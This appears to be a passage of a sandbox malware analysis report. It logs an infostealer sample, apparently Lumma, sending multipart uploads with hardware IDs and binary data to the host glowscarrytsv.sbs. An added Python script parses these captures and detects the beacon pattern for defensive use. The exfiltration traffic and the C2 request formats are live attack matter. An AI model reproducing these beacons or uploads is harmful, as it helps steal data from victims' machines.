                                                                                                2025-01-06 14:15:10 UTC1369INData Raw: 47 4a 51 6f 76 4c 63 64 33 72 6e 62 47 6f 44 72 47 69 2f 41 30 77 64 6b 46 74 31 55 66 58 6e 35 38 77 67 4d 6b 48 7a 6d 6d 4c 30 59 32 48 43 38 53 6c 53 6a 2b 4d 6f 6a 6a 65 38 6e 46 71 32 62 65 7a 51 47 78 56 52 52 6e 57 6c 61 51 47 33 6f 46 4f 34 46 69 47 6e 4e 48 62 42 44 53 54 6f 42 59 6c 4f 6c 71 79 59 6d 45 63 38 48 48 50 4a 6c 68 51 6c 35 30 4f 61 51 66 66 41 55 35 2f 69 38 47 4a 51 6f 76 4c 63 64 33 72 6e 62 45 77 6e 33 48 78 2b 68 72 67 74 4a 43 73 52 59 4c 43 69 6f 37 6b 46 77 79 52 6a 36 7a 66 51 78 6a 55 58 6b 44 6b 6b 36 41 57 4a 54 70 61 73 6d 4a 6d 58 6e 49 33 52 65 6b 52 6c 52 6e 57 6c 61 51 47 33 6f 46 4f 35 56 56 58 46 52 45 62 41 44 62 64 2f 34 37 78 76 59 36 6b 6f 75 46 5a 73 76 62 41 65 56 7a 61 52 74 56 62 59 45 63 5a 41 45 35 2f 69
                                                                                                Data Ascii: GJQovLcd3rnbGoDrGi/A0wdkFt1UfXn58wgMkHzmmL0Y2HC8SlSj+Mojje8nFq2bezQGxVRRnWlaQG3oFO4FiGnNHbBDSToBYlOlqyYmEc8HHPJlhQl50OaQffAU5/i8GJQovLcd3rnbEwn3Hx+hrgtJCsRYLCio7kFwyRj6zfQxjUXkDkk6AWJTpasmJmXnI3RekRlRnWlaQG3oFO5VVXFREbADbd/47xvY6kouFZsvbAeVzaRtVbYEcZAE5/i


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.4 | 49750 | 188.114.97.3 | 443 | 7620 | C:\Users\user\Desktop\SET_UP.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-06 14:15:10 UTC | 279 | OUT | POST /api HTTP/1.1
                                                                                                Connection: Keep-Alive
                                                                                                Content-Type: multipart/form-data; boundary=TT526WWK16ZIQG
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                Content-Length: 18140
                                                                                                Host: glowscarrytsv.sbs
                                                                                                2025-01-06 14:15:10 UTC15331OUTData Raw: 2d 2d 54 54 35 32 36 57 57 4b 31 36 5a 49 51 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 32 32 44 44 39 43 33 34 35 42 39 35 45 45 36 36 39 41 45 37 37 38 46 45 32 37 39 39 44 36 39 0d 0a 2d 2d 54 54 35 32 36 57 57 4b 31 36 5a 49 51 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 54 54 35 32 36 57 57 4b 31 36 5a 49 51 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 68 52 6a 7a 47 33 2d 2d 45 4c 56 49 52 41 0d 0a 2d 2d 54 54 35 32 36 57 57
                                                                                                Data Ascii: --TT526WWK16ZIQGContent-Disposition: form-data; name="hwid"322DD9C345B95EE669AE778FE2799D69--TT526WWK16ZIQGContent-Disposition: form-data; name="pid"2--TT526WWK16ZIQGContent-Disposition: form-data; name="lid"hRjzG3--ELVIRA--TT526WW
                                                                                                2025-01-06 14:15:10 UTC2809OUTData Raw: 7e e6 28 bf 13 cc 94 75 5e c1 bc c6 a2 f2 ea 27 0a 66 e1 9f 97 c5 15 2e a7 07 cf 5c b7 ad 66 f0 cc 99 a8 33 f7 13 05 cf ec 85 7a 3b 85 8d 54 32 2f 1f e5 1b c1 33 7b 37 a5 bf 9f 8e 3a f1 6e 9a e0 79 69 60 c1 4c a6 f2 f7 de 4b 1f 36 af 1d f9 d7 e0 58 6d 5b 0b fd 9c 0a b5 9b 60 cc b0 d7 ab 1f 3b d0 52 0a 9f fd 54 22 95 3f 7a 94 ff 75 ab 9f a1 e3 6f 93 83 99 38 43 4e 2f 95 2f 6d 6e ac ae d3 03 1e ad ac 6f 7a a3 8a 81 36 d9 bf 1f 83 71 fd 1a ed c5 4d d3 3e 9b d8 ac 97 0c bd 15 36 2b 97 37 bb ef 2e 57 0f bc 3e 57 2a 0f 97 2f ad 6d 4a a7 02 2f 2b 7f 42 10 78 3e ba 45 a8 b5 6d 75 bf 83 75 53 b3 09 3b 9c 3e 27 56 d3 d4 ab d6 33 5e 4f 4d 1f 4e cd b2 89 b4 bc b1 b1 56 29 af ef 1e fa 70 79 ed 62 65 cf 7b d9 de 73 45 81 36 af a9 da 16 51 bc 21 8f 77 45 11 8f 43 d4 61
                                                                                                Data Ascii: ~(u^'f.\f3z;T2/3{7:nyi`LK6Xm[`;RT"?zuo8CN//mnoz6qM>6+7.W>W*/mJ/+Bx>EmuuS;>'V3^OMNV)pybe{sE6Q!wECa
2025-01-06 14:15:11 UTC | 1140 | IN | HTTP/1.1 200 OK
                                                                                                Date: Mon, 06 Jan 2025 14:15:11 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: close
                                                                                                Set-Cookie: PHPSESSID=e8finlbbev79aad137emu1jgfe; expires=Fri, 02 May 2025 08:01:50 GMT; Max-Age=9999999; path=/
                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                Pragma: no-cache
                                                                                                X-Frame-Options: DENY
                                                                                                X-Content-Type-Options: nosniff
                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                cf-cache-status: DYNAMIC
                                                                                                vary: accept-encoding
                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=S%2BrWP%2Bbuf9wo25xaye0a%2Fw%2FUAj2QJB5zdGsnyBZzoTz1Gb1sm1%2B42zuB5xwkKxIvPvlQkeBxf2%2B3S6uLtCBWHWyWgjb3G90jimRrNEisqhrEeiMTiykNl7oxFpg%2BVIKRVRctRg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                Server: cloudflare
                                                                                                CF-RAY: 8fdc5193da0a4352-EWR
                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1602&min_rtt=1598&rtt_var=608&sent=9&recv=22&lost=0&retrans=0&sent_bytes=2842&recv_bytes=19099&delivery_rate=1785932&cwnd=239&unsent_bytes=0&cid=97f72cebabc49236&ts=981&x=0"
2025-01-06 14:15:11 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
Data Ascii: fok 8.46.123.189
2025-01-06 14:15:11 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0
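Sessions 0 to 2 above show the whole beacon sequence the sample runs against glowscarrytsv.sbs: a URL-encoded "act=life" check-in answered with a chunked "ok", a "act=recive_message" request carrying ver, lid and j that is answered with a large base64 blob, and a multipart upload carrying hwid, pid, lid and a binary part, answered with "ok" followed by an IPv4 address. The script below is an added example for this report (not Joe Sandbox code and not code recovered from the sample) that reconstructs those bodies from the Data Raw dumps, de-chunks the replies, splits the multipart form even where the dump is cut off mid-delimiter, and applies a coarse network-side check matching the three request shapes. The labels checkin / config_request / upload are this example's own names, and the reading of the address in "ok 8.46.123.189" as the client's public IP as the server sees it is an assumption, not something the capture proves.

```python
import re
from urllib.parse import parse_qs

# Constructed inputs: the request/response bodies decoded from the "Data Raw"
# hex dumps in this report, with the CR/LF bytes the Ascii view drops restored.
LIFE_BODY = b"act=life"
RECV_BODY = (b"act=recive_message&ver=4.0&lid=hRjzG3--ELVIRA"
             b"&j=efdebde057a1df3f7c15b7f4da907c2d")
UPLOAD_CTYPE = "multipart/form-data; boundary=TT526WWK16ZIQG"
UPLOAD_BODY = (  # start of the 15331-byte chunk, cut where the report cuts it
    b'--TT526WWK16ZIQG\r\nContent-Disposition: form-data; name="hwid"\r\n\r\n'
    b'322DD9C345B95EE669AE778FE2799D69\r\n'
    b'--TT526WWK16ZIQG\r\nContent-Disposition: form-data; name="pid"\r\n\r\n2\r\n'
    b'--TT526WWK16ZIQG\r\nContent-Disposition: form-data; name="lid"\r\n\r\n'
    b'hRjzG3--ELVIRA\r\n--TT526WW')
RESP_LIFE = bytes.fromhex("32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a")
RESP_UPLOAD = bytes.fromhex(
    "66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a 30 0d 0a 0d 0a")


def dechunk(raw: bytes) -> bytes:
    """Decode an HTTP/1.1 chunked body. Stops at the first incomplete chunk,
    so a truncated capture still yields the prefix that is actually present."""
    out, pos = bytearray(), 0
    while True:
        eol = raw.find(b"\r\n", pos)
        if eol < 0:
            break
        try:
            size = int(raw[pos:eol].split(b";", 1)[0].strip(), 16)
        except ValueError:
            break
        if size == 0:
            break
        start, end = eol + 2, eol + 2 + size
        if end > len(raw):
            out += raw[start:]
            break
        out += raw[start:end]
        pos = end + 2  # skip the CRLF that terminates the chunk data
    return bytes(out)


def parse_multipart(body: bytes, boundary: str) -> dict:
    """Return {name: value} for each complete multipart/form-data part. A part
    whose closing delimiter is cut off mid-way (as in the dump above) is still
    returned; one cut off inside its value is dropped."""
    delim = b"--" + boundary.encode()
    fields = {}
    for piece in body.split(delim):
        if not piece.startswith(b"\r\n"):
            continue                      # preamble or the closing "--" marker
        cut = piece.rfind(b"\r\n")
        if cut >= 0 and piece[cut + 2:] and delim.startswith(piece[cut + 2:]):
            piece = piece[:cut + 2]       # drop a partially captured delimiter
        if not piece.endswith(b"\r\n"):
            continue                      # the value itself is truncated
        head, _, value = piece[2:].partition(b"\r\n\r\n")
        m = re.search(rb'name="([^"]*)"', head)
        if m:
            fields[m.group(1).decode()] = value[:-2]
    return fields


def classify(content_type: str, body: bytes) -> dict:
    """Label one POST /api body by the fields visible in the capture.
    The kind names are this example's own, not names used by the malware."""
    if content_type.startswith("application/x-www-form-urlencoded"):
        form = {k: v[0] for k, v in parse_qs(body.decode("ascii", "replace")).items()}
        kind = {"life": "checkin", "recive_message": "config_request"}.get(
            form.get("act"), "unknown")
        return {"kind": kind, "fields": form}
    m = re.search(r"boundary=([^;\s]+)", content_type)
    if content_type.startswith("multipart/form-data") and m:
        parts = parse_multipart(body, m.group(1))
        return {"kind": "upload",
                "fields": {k: v.decode("ascii", "replace") for k, v in parts.items()}}
    return {"kind": "unknown", "fields": {}}


def parse_reply(raw_chunked: bytes) -> dict:
    """De-chunk a reply. 'ok' alone acknowledges; 'ok <ip>' also carries an IPv4
    address (assumed here to be the client's public address as the server sees
    it); anything else is treated as an opaque payload such as the base64 blob
    returned to the config request."""
    text = dechunk(raw_chunked)
    m = re.fullmatch(rb"ok(?: (\d{1,3}(?:\.\d{1,3}){3}))?", text)
    if m:
        return {"ack": True, "ip": m.group(1).decode() if m.group(1) else None, "payload": b""}
    return {"ack": False, "ip": None, "payload": text}


def is_lumma_beacon(method: str, path: str, content_type: str, body: bytes) -> bool:
    """Coarse check for the three request shapes in this report: POST /api with
    act=life or act=recive_message, or a multipart upload with hwid, pid and lid."""
    if method != "POST" or path != "/api":
        return False
    info = classify(content_type, body)
    if info["kind"] in ("checkin", "config_request"):
        return True
    return info["kind"] == "upload" and {"hwid", "pid", "lid"}.issubset(info["fields"])


if __name__ == "__main__":
    for ctype, body in (("application/x-www-form-urlencoded", LIFE_BODY),
                        ("application/x-www-form-urlencoded", RECV_BODY),
                        (UPLOAD_CTYPE, UPLOAD_BODY)):
        print(classify(ctype, body))
    print(parse_reply(RESP_LIFE), parse_reply(RESP_UPLOAD))
```

The multipart parser is deliberately tolerant of a dump that ends inside a delimiter, because sandbox reports truncate long bodies at a fixed size; the lid field is still recovered from the cut-off chunk above, while a part whose value was cut would be dropped rather than returned half-read. For detection, the literal strings act=life, act=recive_message and the hwid/pid/lid field set are the cheapest handles; the boundary string and PHPSESSID values change per session and are not useful as indicators.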


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.4 | 49751 | 188.114.97.3 | 443 | 7620 | C:\Users\user\Desktop\SET_UP.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-06 14:15:12 UTC | 279 | OUT | POST /api HTTP/1.1
                                                                                                Connection: Keep-Alive
                                                                                                Content-Type: multipart/form-data; boundary=8KZNW321KQR41UQ
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                Content-Length: 8767
                                                                                                Host: glowscarrytsv.sbs
2025-01-06 14:15:12 UTC | 8767 | OUT | Data Raw: 2d 2d 38 4b 5a 4e 57 33 32 31 4b 51 52 34 31 55 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 32 32 44 44 39 43 33 34 35 42 39 35 45 45 36 36 39 41 45 37 37 38 46 45 32 37 39 39 44 36 39 0d 0a 2d 2d 38 4b 5a 4e 57 33 32 31 4b 51 52 34 31 55 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 38 4b 5a 4e 57 33 32 31 4b 51 52 34 31 55 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 68 52 6a 7a 47 33 2d 2d 45 4c 56 49 52 41 0d 0a 2d 2d 38 4b 5a 4e
Data Ascii (line breaks restored from the 0d 0a bytes; truncated as in the capture):
--8KZNW321KQR41UQ
Content-Disposition: form-data; name="hwid"

322DD9C345B95EE669AE778FE2799D69
--8KZNW321KQR41UQ
Content-Disposition: form-data; name="pid"

2
--8KZNW321KQR41UQ
Content-Disposition: form-data; name="lid"

hRjzG3--ELVIRA
--8KZN
2025-01-06 14:15:12 UTC | 1135 | IN | HTTP/1.1 200 OK
                                                                                                Date: Mon, 06 Jan 2025 14:15:12 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: close
                                                                                                Set-Cookie: PHPSESSID=3qi7rr4bg3ddg24s7gn17e6itn; expires=Fri, 02 May 2025 08:01:51 GMT; Max-Age=9999999; path=/
                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                Pragma: no-cache
                                                                                                X-Frame-Options: DENY
                                                                                                X-Content-Type-Options: nosniff
                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                cf-cache-status: DYNAMIC
                                                                                                vary: accept-encoding
                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FVsGiWPzaxZFLh9a2OWC1bADPT2bl7I5fI0O7nB6C%2Bvbnj42x5W7qyAtfOc%2FI2jue0W4DfOBgRzScjxFd8vYprVFQ943Z%2F3oqPJ%2BcOErNXrWTzUb83DSD4VfUZcBysnMRLStgw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                Server: cloudflare
                                                                                                CF-RAY: 8fdc519d3cf34210-EWR
                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1766&min_rtt=1764&rtt_var=665&sent=7&recv=14&lost=0&retrans=0&sent_bytes=2842&recv_bytes=9704&delivery_rate=1639528&cwnd=246&unsent_bytes=0&cid=be842c9c4cb7ba94&ts=506&x=0"
2025-01-06 14:15:12 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
Data Ascii (chunked body; "f" is the hex length of the 15-byte chunk that follows): f
ok 8.46.123.189
2025-01-06 14:15:12 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii (terminating zero-length chunk): 0


Session ID: 4 | Source IP: 192.168.2.4 | Source Port: 49752 | Destination IP: 188.114.97.3 | Destination Port: 443 | PID: 7620 | Process: C:\Users\user\Desktop\SET_UP.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-06 14:15:13 UTC | 283 | OUT | POST /api HTTP/1.1
                                                                                                Connection: Keep-Alive
                                                                                                Content-Type: multipart/form-data; boundary=LH89NZCPPT358FSVRS
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                Content-Length: 20438
                                                                                                Host: glowscarrytsv.sbs
2025-01-06 14:15:13 UTC | 15331 | OUT | Data Raw: 2d 2d 4c 48 38 39 4e 5a 43 50 50 54 33 35 38 46 53 56 52 53 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 32 32 44 44 39 43 33 34 35 42 39 35 45 45 36 36 39 41 45 37 37 38 46 45 32 37 39 39 44 36 39 0d 0a 2d 2d 4c 48 38 39 4e 5a 43 50 50 54 33 35 38 46 53 56 52 53 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 4c 48 38 39 4e 5a 43 50 50 54 33 35 38 46 53 56 52 53 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 68 52 6a 7a 47 33 2d 2d 45 4c 56 49 52
Data Ascii (line breaks restored from the 0d 0a bytes; truncated as in the capture):
--LH89NZCPPT358FSVRS
Content-Disposition: form-data; name="hwid"

322DD9C345B95EE669AE778FE2799D69
--LH89NZCPPT358FSVRS
Content-Disposition: form-data; name="pid"

3
--LH89NZCPPT358FSVRS
Content-Disposition: form-data; name="lid"

hRjzG3--ELVIR
2025-01-06 14:15:13 UTC | 5107 | OUT | Data Raw: 00 00 00 00 00 00 00 00 60 93 1b 88 82 85 4d 3f 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 72 83 51 b0 b0 e9 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4d 6e 20 0a 16 36 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 0d 46 c1 c2 a6 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b9 81 28 58 d8 f4 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 26 37 18 05 0b 9b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e4 06 a2 60 61 d3 4f 03
Data Ascii (binary continuation of the same multipart body; non-printable bytes dropped by the report): `M?lrQMn 64F6(X&7~`aO
2025-01-06 14:15:13 UTC | 1141 | IN | HTTP/1.1 200 OK
                                                                                                Date: Mon, 06 Jan 2025 14:15:13 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: close
                                                                                                Set-Cookie: PHPSESSID=iebf2r190mqejjponf3sp18gku; expires=Fri, 02 May 2025 08:01:52 GMT; Max-Age=9999999; path=/
                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                Pragma: no-cache
                                                                                                X-Frame-Options: DENY
                                                                                                X-Content-Type-Options: nosniff
                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                cf-cache-status: DYNAMIC
                                                                                                vary: accept-encoding
                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SMO%2FoSr15qpXfSIckGNerTtu9THJsBI%2B8ywdoyoIUMskC9uFP%2B60nnJjk%2F6KpN3N2c9fxgQzpMsOPz7440g5m%2Bb4jHnFYnNhYmiWMraPIdXOd7JciTyNVN0JSJN%2BkW8z4E0E2w%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                Server: cloudflare
                                                                                                CF-RAY: 8fdc51a4fd7e42bd-EWR
                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=12516&min_rtt=1763&rtt_var=7191&sent=12&recv=24&lost=0&retrans=0&sent_bytes=2843&recv_bytes=21401&delivery_rate=1656267&cwnd=196&unsent_bytes=0&cid=10527891c2db3766&ts=609&x=0"
2025-01-06 14:15:13 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
Data Ascii (chunked body; "f" is the hex length of the 15-byte chunk that follows): f
ok 8.46.123.189
2025-01-06 14:15:13 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii (terminating zero-length chunk): 0


Session ID: 5 | Source IP: 192.168.2.4 | Source Port: 49753 | Destination IP: 188.114.97.3 | Destination Port: 443 | PID: 7620 | Process: C:\Users\user\Desktop\SET_UP.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-06 14:15:14 UTC | 271 | OUT | POST /api HTTP/1.1
                                                                                                Connection: Keep-Alive
                                                                                                Content-Type: multipart/form-data; boundary=RAO4YOWP
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                Content-Length: 916
                                                                                                Host: glowscarrytsv.sbs
2025-01-06 14:15:14 UTC | 916 | OUT | Data Raw: 2d 2d 52 41 4f 34 59 4f 57 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 32 32 44 44 39 43 33 34 35 42 39 35 45 45 36 36 39 41 45 37 37 38 46 45 32 37 39 39 44 36 39 0d 0a 2d 2d 52 41 4f 34 59 4f 57 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 52 41 4f 34 59 4f 57 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 68 52 6a 7a 47 33 2d 2d 45 4c 56 49 52 41 0d 0a 2d 2d 52 41 4f 34 59 4f 57 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69
Data Ascii (line breaks restored from the 0d 0a bytes; truncated as in the capture):
--RAO4YOWP
Content-Disposition: form-data; name="hwid"

322DD9C345B95EE669AE778FE2799D69
--RAO4YOWP
Content-Disposition: form-data; name="pid"

1
--RAO4YOWP
Content-Disposition: form-data; name="lid"

hRjzG3--ELVIRA
--RAO4YOWP
Content-Disposi
2025-01-06 14:15:15 UTC | 1128 | IN | HTTP/1.1 200 OK
                                                                                                Date: Mon, 06 Jan 2025 14:15:15 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: close
                                                                                                Set-Cookie: PHPSESSID=jt4t5s3h44d84vln13sls7dbcf; expires=Fri, 02 May 2025 08:01:54 GMT; Max-Age=9999999; path=/
                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                Pragma: no-cache
                                                                                                X-Frame-Options: DENY
                                                                                                X-Content-Type-Options: nosniff
                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                cf-cache-status: DYNAMIC
                                                                                                vary: accept-encoding
                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hLCdUlVqJP5vnvlVALpG4Z1N8oFi40YyAmIiXXUHnMwiDwpwx2p4M%2BExExakfAIpizMd04fcqjSEP2u5egvBeRfbF4jMOcNa16Z05vt%2F00fckkBLBIdI5YGWX8V93R634FFIeQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                Server: cloudflare
                                                                                                CF-RAY: 8fdc51ad5c3ec45c-EWR
                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1542&min_rtt=1523&rtt_var=610&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2842&recv_bytes=1823&delivery_rate=1737061&cwnd=243&unsent_bytes=0&cid=f7ceebefa5552023&ts=823&x=0"
2025-01-06 14:15:15 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
Data Ascii (chunked body; "f" is the hex length of the 15-byte chunk that follows): f
ok 8.46.123.189
2025-01-06 14:15:15 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii (terminating zero-length chunk): 0


Session ID: 6 | Source IP: 192.168.2.4 | Source Port: 49754 | Destination IP: 188.114.97.3 | Destination Port: 443 | PID: 7620 | Process: C:\Users\user\Desktop\SET_UP.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-06 14:15:16 UTC | 283 | OUT | POST /api HTTP/1.1
                                                                                                Connection: Keep-Alive
                                                                                                Content-Type: multipart/form-data; boundary=SZ2TPF9HTZ8ABB2DKFX
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                Content-Length: 1112
                                                                                                Host: glowscarrytsv.sbs
2025-01-06 14:15:16 UTC | 1112 | OUT | Data Raw: 2d 2d 53 5a 32 54 50 46 39 48 54 5a 38 41 42 42 32 44 4b 46 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 32 32 44 44 39 43 33 34 35 42 39 35 45 45 36 36 39 41 45 37 37 38 46 45 32 37 39 39 44 36 39 0d 0a 2d 2d 53 5a 32 54 50 46 39 48 54 5a 38 41 42 42 32 44 4b 46 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 53 5a 32 54 50 46 39 48 54 5a 38 41 42 42 32 44 4b 46 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 68 52 6a 7a 47 33 2d 2d 45 4c
Data Ascii (line breaks restored from the 0d 0a bytes; truncated as in the capture):
--SZ2TPF9HTZ8ABB2DKFX
Content-Disposition: form-data; name="hwid"

322DD9C345B95EE669AE778FE2799D69
--SZ2TPF9HTZ8ABB2DKFX
Content-Disposition: form-data; name="pid"

1
--SZ2TPF9HTZ8ABB2DKFX
Content-Disposition: form-data; name="lid"

hRjzG3--EL
2025-01-06 14:15:23 UTC | 1146 | IN | HTTP/1.1 200 OK
                                                                                                Date: Mon, 06 Jan 2025 14:15:23 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: close
